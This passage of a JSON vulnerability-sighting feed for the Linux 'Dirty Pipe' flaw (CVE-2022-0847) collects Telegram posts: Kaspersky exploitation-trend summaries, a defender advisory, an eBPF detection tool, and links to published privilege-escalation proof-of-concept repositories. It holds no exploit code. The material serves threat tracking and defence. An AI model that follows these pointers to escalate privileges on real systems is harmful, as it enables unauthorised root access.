\n\n@avleonovrus #Linux #Kernel #EOP #DirtyCred", "creation_timestamp": "2023-09-21T09:19:24.000000Z"}, {"uuid": "2f32278d-2adb-4077-a13d-0eb53e7b4911", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://t.me/OxC8HR/35", "content": "Clear out the Linux root password using CVE-2022-0847:\n\nA vulnerability in the Linux kernel since 5.8 which allows overwriting data in arbitrary read-only files. This leads to privilege escalation because unprivileged processes can inject code into root processes.\n\nhttps://twitter.com/xtremepentest/status/1501130255502913538?s=20&t=IF6EHliyY2DsZTWAPTb6mA", "creation_timestamp": "2022-04-20T18:17:38.000000Z"}, {"uuid": "3ecfcb88-46d6-477d-9e06-273db425798e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "exploited", "source": "Telegram/koWg9picjaG2ToUTHmWZAVRmpkVaxUxcP1juXCV4e7L2qpk", "content": "", "creation_timestamp": "2026-04-02T09:00:05.000000Z"}, {"uuid": "b1423ac2-afe1-421d-ac1a-e5886ea0cf75", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://t.me/kasperskyb2b/2103", "content": "\u2755 \u0422\u0435\u043d\u0434\u0435\u043d\u0446\u0438\u0438 \u0432 \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439: \u041e\u0421 Linux \u0441\u0442\u0430\u043b\u0430 \u0441\u043b\u0438\u0448\u043a\u043e\u043c \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u0430 \n\n\u042d\u043a\u0441\u043f\u0435\u0440\u0442\u044b \u00ab\u041b\u0430\u0431\u043e\u0440\u0430\u0442\u043e\u0440\u0438\u0438 \u041a\u0430\u0441\u043f\u0435\u0440\u0441\u043a\u043e\u0433\u043e\u00bb \u043f\u0440\u043e\u0430\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u043b\u0438\u0441\u044c \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0430\u0445 \u0432 4 \u043a\u0432\u0430\u0440\u0442\u0430\u043b\u0435 2025 \u0433\u043e\u0434\u0430.  \u041a\u0430\u043a \u043e\u0431\u044b\u0447\u043d\u043e, \u043a\u0430\u0440\u0442\u0438\u043d\u0430 \u0441\u0438\u043b\u044c\u043d\u043e \u0440\u0430\u0437\u043b\u0438\u0447\u0430\u0435\u0442\u0441\u044f \u0434\u043b\u044f \u0446\u0435\u043b\u0435\u0432\u044b\u0445 \u0438 \u0448\u0438\u0440\u043e\u043a\u043e\u0437\u0430\u0445\u0432\u0430\u0442\u043d\u044b\u0445 \u0430\u0442\u0430\u043a, \u043d\u043e \u0438 \u0442\u0430\u043c, \u0438 \u0442\u0430\u043c \u043d\u0435\u0441\u043a\u0443\u0447\u043d\u043e. \n\n\u041d\u0435\u0438\u0437\u0431\u0438\u0440\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u0430\u0442\u0430\u043a\u0438:\n\ud83d\udfe3 \u043a\u043e\u0441\u043c\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u0440\u043e\u0441\u0442 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043d\u0430 \u0441\u0435\u043c\u0435\u0439\u0441\u0442\u0432\u0435 \u041e\u0421 *nix \u2014 \u043f\u043e\u043b\u043e\u0432\u0438\u043d\u0430 \u0432\u0441\u0435\u0445 \u0430\u0442\u0430\u043a \u0437\u0430 2025 \u0433\u043e\u0434 \u043f\u0440\u0438\u0448\u043b\u0430\u0441\u044c \u043d\u0430 4 \u043a\u0432\u0430\u0440\u0442\u0430\u043b. \u041e\u0431\u0443\u0441\u043b\u043e\u0432\u043b\u0435\u043d\u043e \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0430\u0442\u0430\u043a\u0430\u043c\u0438 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u044b, \u043d\u043e \u0438 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u0438\u0437\u0430\u0446\u0438\u0435\u0439 Linux \u0434\u043b\u044f \u0434\u0435\u0441\u043a\u0442\u043e\u043f\u043e\u0432;\n\ud83d\udfe3\u043f\u043e\u0434\u0432\u0435\u0440\u0433\u0430\u044e\u0442\u0441\u044f \u0430\u0442\u0430\u043a\u0435 \u0432 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u043c \u0434\u0440\u0435\u0432\u043d\u0438\u0435 \u0434\u0435\u0444\u0435\u043a\u0442\u044b Linux, \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043d\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u044f\u044e\u0442\u0441\u044f: \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Dirty Pipe, \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 Netfilter. \u042d\u0442\u043e CVE-2022-0847, CVE-2019-13272, CVE-2021-22555, CVE-2023-32233;\n\ud83d\udfe3 \u0434\u043b\u044f \u041e\u0421 Windows \u0442\u0435\u043c\u043f\u044b \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0441\u043d\u0438\u0437\u0438\u043b\u0438\u0441\u044c \u0434\u043e \u0441\u0430\u043c\u043e\u0433\u043e \u043d\u0438\u0437\u043a\u043e\u0433\u043e \u0443\u0440\u043e\u0432\u043d\u044f \u0432 2025 \u0433\u043e\u0434\u0443, \u043d\u043e \u043e\u043d\u0438 \u0432\u0441\u0451 \u0440\u0430\u0432\u043d\u043e \u043f\u0440\u0435\u0432\u044b\u0448\u0430\u044e\u0442 \u043d\u0430\u0447\u0430\u043b\u043e 2024-\u0433\u043e;\n\ud83d\udfe3 \u0434\u043e\u043c\u0438\u043d\u0438\u0440\u0443\u044e\u0442 \u0442\u0430\u043a\u0436\u0435 \u0434\u0440\u0435\u0432\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438: CVE-2017-11882 \u0438 CVE-2018-0802 \u0432 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u0435 Equation Editor \u0438\u0437 \u043f\u0430\u043a\u0435\u0442\u0430 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439 Microsoft Office, CVE-2017-0199 \u0432 Microsoft Office \u0438 WordPad.\n\n\u041a\u0430\u043a \u0432 \u0446\u0435\u043b\u0435\u0432\u044b\u0445, \u0442\u0430\u043a \u0438 \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0445 \u0430\u0442\u0430\u043a\u0430\u0445, \u0433\u043e\u0440\u0430\u0437\u0434\u043e \u0430\u043a\u0442\u0438\u0432\u043d\u0435\u0435 \u0446\u0435\u043b\u044f\u0442\u0441\u044f \u0432 \u0434\u0435\u0444\u0435\u043a\u0442\u044b \u0430\u0440\u0445\u0438\u0432\u0430\u0442\u043e\u0440\u043e\u0432. \u0412 2025 \u0433\u043e\u0434\u0443 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u043b\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 WinRAR (CVE-2023-38831, CVE-2025-6218 \u0438 -8088) \u0438 7-Zip (CVE-2025-11001).\n\n\u0426\u0435\u043b\u0435\u0432\u044b\u0435 \u0430\u0442\u0430\u043a\u0438:\n\ud83d\udfe3 \u0432 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u043c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442 \u0441\u0432\u0435\u0436\u0438\u0435 \u0434\u0435\u0444\u0435\u043a\u0442\u044b \u0437\u0430 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0435 \u043f\u043e\u043b\u0433\u043e\u0434\u0430;\n\ud83d\udfe3 \u0441 \u0433\u0438\u0433\u0430\u043d\u0442\u0441\u043a\u0438\u043c \u043e\u0442\u0440\u044b\u0432\u043e\u043c \u0434\u043e\u043c\u0438\u043d\u0438\u0440\u0443\u0435\u0442 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f React4shell, \u0432 \u0442\u0440\u043e\u0439\u043a\u0435 \u043b\u0438\u0434\u0435\u0440\u043e\u0432 \u0442\u0430\u043a\u0436\u0435 CVE-2025-61882 \u0432 Oracle E-Business Suite \u0438 CVE-2025-8088 \u0432 WinRAR;\n\ud83d\udfe3 \u043c\u043d\u043e\u0433\u0438\u0435 CVE \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e \u0437\u0430\u043a\u0440\u0435\u043f\u044f\u0442\u0441\u044f \u0432 \u0445\u0438\u0442-\u043f\u0430\u0440\u0430\u0434\u0435 \u043d\u0430\u0434\u043e\u043b\u0433\u043e, \u0434\u043b\u044f \u0438\u0445 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0442\u0440\u0435\u0431\u0443\u044e\u0442\u0441\u044f \u0441\u0435\u0440\u044c\u0451\u0437\u043d\u044b\u0435 \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u043d\u044b\u0435 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f \u0432 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f\u0445 \u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435;\n\ud83d\udfe3 \u043f\u043e\u0441\u043b\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0447\u0430\u0449\u0435 \u0432\u0441\u0435\u0433\u043e \u0440\u0430\u0437\u0432\u043e\u0440\u0430\u0447\u0438\u0432\u0430\u044e\u0442 \u0438\u043c\u043f\u043b\u0430\u043d\u0442\u044b \u043d\u0430 \u0431\u0430\u0437\u0435 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432 Silver, Mythic, Havoc \u0438 Metasploit.\n\n\ud83d\udccc \u0412 \u043f\u043e\u043b\u043d\u043e\u043c \u043e\u0442\u0447\u0451\u0442\u0435 \u043d\u0430 \u0441\u0430\u0439\u0442\u0435 Securelist \u044d\u0442\u0438 \u0442\u0435\u043d\u0434\u0435\u043d\u0446\u0438\u0438 \u0440\u0430\u0437\u043e\u0431\u0440\u0430\u043d\u044b \u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e, \u043f\u043e\u043a\u0430\u0437\u0430\u043d\u044b \u0441\u0432\u044f\u0437\u0438 \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u044b\u0445 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0445 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u0441 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u043c\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c\u0438, \u0430 \u0442\u0430\u043a\u0436\u0435 \u043e\u043f\u0438\u0441\u0430\u043d\u044b \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u043f\u0440\u0438\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u0438 \u0432\u0430\u0436\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 2025 \u0433\u043e\u0434\u0430. \n\n#\u0441\u0442\u0430\u0442\u0438\u0441\u0442\u0438\u043a\u0430 #\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 @\u041f2\u0422", "creation_timestamp": "2026-03-10T14:02:31.000000Z"}, {"uuid": "2ca8f8f7-e4d4-4901-b5f7-498129cc1ed8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1963", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aScripted Linux Privilege Escalation for the CVE-2022-0847 \\\"Dirty Pipe\\\" vulnerability\nURL\uff1ahttps://github.com/rexpository/Linux-privilege-escalation\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-04-17T05:01:39.000000Z"}, {"uuid": "23dea769-0bd2-4967-8659-72b459b3ffb8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://t.me/true_secator/7978", "content": "\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0438\u0437 \u041b\u0430\u0431\u043e\u0440\u0430\u0442\u043e\u0440\u0438\u0438 \u041a\u0430\u0441\u043f\u0435\u0440\u0441\u043a\u043e\u0433\u043e \u0432 \u0441\u0432\u043e\u0435\u043c \u043d\u043e\u0432\u043e\u043c \u043e\u0442\u0447\u0435\u0442\u0435 \u043a\u043e\u043d\u0441\u0442\u0430\u0442\u0438\u0440\u0443\u044e\u0442, \u0447\u0442\u043e 4 \u043a\u0432\u0430\u0440\u0442\u0430\u043b 2025 \u0441\u0442\u0430\u043b \u043e\u0434\u043d\u0438\u043c \u0438\u0437 \u0441\u0430\u043c\u044b\u0445 \u043d\u0430\u0441\u044b\u0449\u0435\u043d\u043d\u044b\u0445 \u043f\u043e \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u0443 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u0439 \u0433\u0440\u043e\u043c\u043a\u0438\u0445 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0431\u044b\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u044b \u0432 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0445 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0430\u0445 \u0438 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f\u0445.\n\n\u0410\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u0443\u044f \u0442\u0435\u043d\u0434\u0435\u043d\u0446\u0438\u0438 \u0432 \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u0432 \u041b\u041a \u043e\u0442\u043c\u0435\u0442\u0438\u043b\u0438, \u0447\u0442\u043e \u0432 \u044d\u0442\u043e\u043c \u043f\u043b\u0430\u043d\u0435 \u041e\u0421 Linux \u0441\u0442\u0430\u043b\u0430 \u0441\u043b\u0438\u0448\u043a\u043e\u043c \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u0430. \u041d\u0430 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0439 \u043a\u0432\u0430\u0440\u0442\u0430\u043b \u0433\u043e\u0434\u0430 \u043f\u0440\u0438\u0448\u043b\u043e\u0441\u044c \u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u043b\u043e\u0432\u0438\u043d\u044b \u0432\u0441\u0435\u0445 \u0430\u0442\u0430\u043a \u0441 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430\u043c\u0438 \u0434\u043b\u044f Linux \u043e\u0442 \u0441\u0443\u043c\u043c\u0430\u0440\u043d\u044b\u0445 \u0433\u043e\u0434\u043e\u0432\u044b\u0445 \u043f\u043e\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u0435\u0439.\u00a0\n\n\u0412 \u043f\u0435\u0440\u0432\u0443\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c, \u043f\u0440\u0438\u0447\u0438\u043d\u043e\u0439 \u0442\u0430\u043a\u043e\u0433\u043e \u0432\u0441\u043f\u043b\u0435\u0441\u043a\u0430 \u0441\u0442\u0430\u043b\u043e \u0431\u044b\u0441\u0442\u0440\u043e\u0440\u0430\u0441\u0442\u0443\u0449\u0435\u0435 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0438\u0445 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432 \u043f\u043e\u0434 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c Linux.\n\n\u041a\u0430\u043a \u043e\u0431\u044b\u0447\u043d\u043e, \u043a\u0430\u0440\u0442\u0438\u043d\u0430 \u0442\u0430\u043a\u0436\u0435 \u0441\u0438\u043b\u044c\u043d\u043e \u0440\u0430\u0437\u043b\u0438\u0447\u0430\u0435\u0442\u0441\u044f \u0434\u043b\u044f \u0446\u0435\u043b\u0435\u0432\u044b\u0445 \u0438 \u0448\u0438\u0440\u043e\u043a\u043e\u0437\u0430\u0445\u0432\u0430\u0442\u043d\u044b\u0445 \u0430\u0442\u0430\u043a. \u0412 \u043e\u0431\u043e\u0438\u0445 \u0441\u043b\u0443\u0447\u0430\u044f\u0445 - \u0434\u0438\u043d\u0430\u043c\u0438\u043a\u0430 \u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u0430.\n\n\u0412 \u0441\u043b\u0443\u0447\u0430\u0435 \u043d\u0435\u0438\u0437\u0431\u0438\u0440\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0430\u0442\u0430\u043a:\n- \u043f\u043e\u0434 \u043f\u0440\u0438\u0446\u0435\u043b\u043e\u043c \u0432 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u043c \u0441\u0442\u0430\u0440\u044b\u0435 \u0434\u0435\u0444\u0435\u043a\u0442\u044b Linux, \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043d\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u044f\u044e\u0442\u0441\u044f: \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Dirty Pipe, \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 Netfilter (CVE-2022-0847, CVE-2019-13272, CVE-2021-22555, CVE-2023-32233);\n- \u0434\u043b\u044f \u041e\u0421 Windows \u0442\u0435\u043c\u043f\u044b \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0441\u043d\u0438\u0437\u0438\u043b\u0438\u0441\u044c \u0434\u043e \u0441\u0430\u043c\u043e\u0433\u043e \u043d\u0438\u0437\u043a\u043e\u0433\u043e \u0443\u0440\u043e\u0432\u043d\u044f \u0432 2025 \u0433\u043e\u0434\u0443, \u043d\u043e \u043e\u043d\u0438 \u0432\u0441\u0451 \u0440\u0430\u0432\u043d\u043e \u043f\u0440\u0435\u0432\u044b\u0448\u0430\u044e\u0442 \u043d\u0430\u0447\u0430\u043b\u043e 2024-\u0433\u043e, \u0434\u043e\u043c\u0438\u043d\u0438\u0440\u0443\u044e\u0442 \u0442\u0430\u043a\u0436\u0435 \u0443\u0441\u0442\u0430\u0440\u0435\u0432\u0448\u0438\u0435 CVE-2017-11882 \u0438 CVE-2018-0802 \u0432 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u0435 Equation Editor \u0438\u0437 Microsoft Office, CVE-2017-0199 \u0432 Microsoft Office \u0438 WordPad.\n\n\u041a\u0430\u043a \u0432 \u0446\u0435\u043b\u0435\u0432\u044b\u0445, \u0442\u0430\u043a \u0438 \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0445 \u0430\u0442\u0430\u043a\u0430\u0445, \u0433\u043e\u0440\u0430\u0437\u0434\u043e \u0430\u043a\u0442\u0438\u0432\u043d\u0435\u0435 \u043f\u043e\u0434 \u0443\u0434\u0430\u0440 \u043f\u043e\u043f\u0430\u0434\u0430\u044e\u0442 \u0432 \u043e\u0448\u0438\u0431\u043a\u0438 \u0432 \u0430\u0440\u0445\u0438\u0432\u0430\u0442\u043e\u0440\u0430\u0445. \u0412 2025 \u0433\u043e\u0434\u0443 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u043b\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 WinRAR (CVE-2023-38831, CVE-2025-6218 \u0438 -8088) \u0438 7-Zip (CVE-2025-11001).\n\n\u041f\u043e \u0447\u0430\u0441\u0442\u0438 \u0446\u0435\u043b\u0435\u0432\u044b\u0445 \u0430\u0442\u0430\u043a:\n- \u0432 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u043c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442 \u0441\u0432\u0435\u0436\u0438\u0435 \u0434\u0435\u0444\u0435\u043a\u0442\u044b \u0437\u0430 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0435 \u043f\u043e\u043b\u0433\u043e\u0434\u0430;\n- \u0441 \u0433\u0438\u0433\u0430\u043d\u0442\u0441\u043a\u0438\u043c \u043e\u0442\u0440\u044b\u0432\u043e\u043c \u0434\u043e\u043c\u0438\u043d\u0438\u0440\u0443\u0435\u0442 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f React4shell, \u0442\u0430\u043a\u0436\u0435 \u0432 \u0442\u0440\u043e\u0439\u043a\u0435 \u043b\u0438\u0434\u0435\u0440\u043e\u0432 \u0442\u0430\u043a\u0436\u0435 CVE-2025-61882 \u0432 Oracle E-Business Suite \u0438 CVE-2025-8088 \u0432 WinRAR;\n- \u043c\u043d\u043e\u0433\u0438\u0435 CVE \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e \u043e\u0441\u0442\u0430\u043d\u0443\u0442\u0441\u044f \u0432 \u0440\u0435\u0439\u0442\u0438\u043d\u0433\u0435 \u043d\u0430\u0434\u043e\u043b\u0433\u043e, \u0434\u043b\u044f \u0438\u0445 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0442\u0440\u0435\u0431\u0443\u044e\u0442\u0441\u044f \u0441\u0435\u0440\u044c\u0451\u0437\u043d\u044b\u0435 \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u043d\u044b\u0435 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f \u0432 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f\u0445 \u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435;\n- \u043f\u043e\u0441\u043b\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0447\u0430\u0449\u0435 \u0432\u0441\u0435\u0433\u043e \u0440\u0430\u0437\u0432\u043e\u0440\u0430\u0447\u0438\u0432\u0430\u044e\u0442 \u0438\u043c\u043f\u043b\u0430\u043d\u0442\u044b \u043d\u0430 \u0431\u0430\u0437\u0435 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432 Silver, Mythic, Havoc \u0438 Metasploit.\n\n\u041f\u043e\u0434\u0440\u043e\u0431\u043d\u0430\u044f \u0438\u043d\u0444\u043e\u0433\u0440\u0430\u0444\u0438\u043a\u0430, \u0441\u0442\u0430\u0442\u0438\u0441\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u043f\u043e\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u0438 \u0438 \u0440\u0430\u0437\u0431\u043e\u0440 \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u043f\u0440\u0438\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 - \u0432 \u043e\u0442\u0447\u0435\u0442\u0435 \u041b\u041a.", "creation_timestamp": "2026-03-10T15:26:05.000000Z"}, {"uuid": "c4d8f6f4-353d-4cd5-a61e-da4f776c239a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "Telegram/zaWOloGTmuxgYwScvhSZBdX4Ig42r1BJF11flVCmJ6M5QnQ", "content": "", "creation_timestamp": "2026-01-07T21:00:04.000000Z"}, {"uuid": "46d1d437-fa94-4840-a9b5-0a272f4e4d7f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/cKure/11934", "content": "\u25a0\u25a0\u25a0\u25a1\u25a1 CVE-2022-0847 eBPF: An eBPF program to detect and defense attacks on CVE-2022-0847 (DirtyPipe).\n\nhttps://github.com/h4ckm310n/CVE-2022-0847-eBPF", "creation_timestamp": "2023-11-06T22:08:05.000000Z"}, {"uuid": "db708243-984b-4c79-b435-4147f5983d90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "Telegram/kbwvMEYxNMTUq0MoPBZhBxwW65HhDCC2hCGDcY8gOyB2buw", "content": "", "creation_timestamp": "2025-09-11T21:00:04.000000Z"}, {"uuid": "41a49611-23a8-491a-bda1-8fd8e0b99dd2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/cloud_sec/320", "content": "\ud83d\udd36\ud83d\udd37\ud83d\udd34 CVE-2022-0847 (aka Dirty Pipe): What does it mean for defenders\n\nA quick summary and actionable advice for defenders of cloud environments and those teams who are asked to determine the impact of CVE-2022-0847 on their company's infrastructure.\n\nhttps://www.marcolancini.it/2022/blog-cve-2022-0847-dirty-pipe\n\n#aws #azure #gcp", "creation_timestamp": "2022-03-14T05:47:43.000000Z"}, {"uuid": "8d5e2283-d948-4641-8582-3b9570f0482c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://t.me/habr_com_news/3957", "content": "\u200b\u0412 \u044f\u0434\u0440\u0435 Linux \u043d\u0430\u0448\u043b\u0438 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0442\u044c \u043b\u044e\u0431\u044b\u0435 \u0444\u0430\u0439\u043b\u044b \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 CM4all 